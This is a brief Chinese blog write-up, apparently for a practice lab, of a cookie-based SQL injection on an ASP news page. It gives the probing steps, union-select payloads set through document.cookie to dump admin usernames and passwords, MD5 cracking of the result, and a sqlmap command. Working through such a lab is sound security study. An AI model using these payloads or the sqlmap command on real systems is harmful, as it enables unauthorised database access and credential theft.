首先进到靶场
利用and 1=2判断此处是否存在sql注入
and 1=1
随后ordrby 11报错
order by 10不报错
随后去找回显
document.cookie=”id=”+escape(“171 union select 1,2,3,4,5,6,7,8,9,10 from admin”)
这里回显2和3所以断定这两处是username和password
输入语句
document.cookie=”id=”+escape(“171 union select 1,username,password,4,5,6,7,8,9,10 from admin”)
这里的密码处估计是md5解码
拿去解一下就知道了
这里得出来一个字符串,用到MAD解密即可得出真正的flag值
password:welcom
结束
sqlmap -u http://ip/shownews.asp —cookie —level 3 —dbs
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.